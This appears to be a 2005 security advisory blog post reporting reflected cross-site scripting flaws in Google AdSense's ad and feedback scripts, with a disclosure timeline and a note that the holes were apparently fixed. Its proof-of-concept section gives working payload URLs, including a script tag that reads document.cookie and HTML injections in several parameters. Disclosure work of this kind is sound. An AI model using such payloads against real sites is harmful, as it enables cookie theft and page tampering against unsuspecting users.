Google Adsense multiple variable XSS

Saturday, April 30, 2005
#####################################################
Google Adsense multiple variable XSS
vendor url:https://www.google.com/adsense/?hl=en_US
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-multiple-variable-xss.html
vendor notify: yes exploit available: yes
######################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly 'client' , 'hl' , 'client' , 'adU', 'adT',
'exp' and 'done' variables upon submission to the 'pagead/ads'
and 'feedback/abg' scripts.This could allow a user to create a
specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and the
server,leading to a loss of integrity.

#########
solution:
##########

Aparently all are pached !!!

#############
timeline:
#############

discovered: 28 april 2005
vendor notified: 29 april 2005
vendor response: 29 april 2005 (autoresponder)
vendor response: 30 april 2005 (email)
fix: 30 april 2005
disclosure: 1 may 2005

#################
proof of concept:
#################
I try the ad´s show in Bandaancha.st because
i like the information provide by this web :DDDD
--

###################
software used
##################
windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1
--
in this case the ad´s displayed are "tipical" related shopping carts
--

http://pagead2.googlesyndication.com/pagead/ads?client=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3Eca-pub-701951298956
4856&dt=1114800478343&lmt=1114800477&format=fp_al_lp
&output=html&channel=8235212864&url=http%3A%2F%2Fwww
.soft32.com%2Fdow nload-publisher-80337-3.html&ref=http%3A%2F
%2Fwww.soft32.com%2Fdownload_80337.html&u_h=768&u_w=
1024&u_ah=740&u_aw=1024&u_cd=32&u_tz=120&u_his
=4&u_java=true&u_nplug=25&u_nmime=93&kw_type=broad
&prev_fmts=180x90_0ads_al_s&rt=ChBCcoJ7AAm3zAoSZDJjsh4zEhl
GcmVlIFBheVBhbCBTaG9wcGluZyBDYXJ0Ggj8cRRPG6sWqA&hl=en

diferent variables afected.

'hl' , 'client' , 'adU', 'adT', 'exp' and ' 'done' aparently afected.

http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl="><strong><h1>Lostmon
_was_here!!</h1></strong>es&client=ca-pub-42070770121
30458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=Marketingy
Comercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.
com&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaan
cha.st/index.php&hl=es&client="><strong><h1>
;Lostmon_was_here!!!</h1></strong>ca-pub-4207077012
130458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyCom
ercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.co
m&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU="
><strong><h1>Lostmon_was_here!!!</h1></s
trong>www.abeltronica.com&adT=Prueba+Gratis+su+Internet&adU=w
ww.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerci
o.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&adT
=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU=www.ab
eltronica.com&adT="><strong><h1>Lostmon_was
_here!!</h1></strong>Prueba+Gratis+su+Internet&adU=
www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerc
io.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&ad
T=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


(Yet another) Google Cross Site Scripting

################ End #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...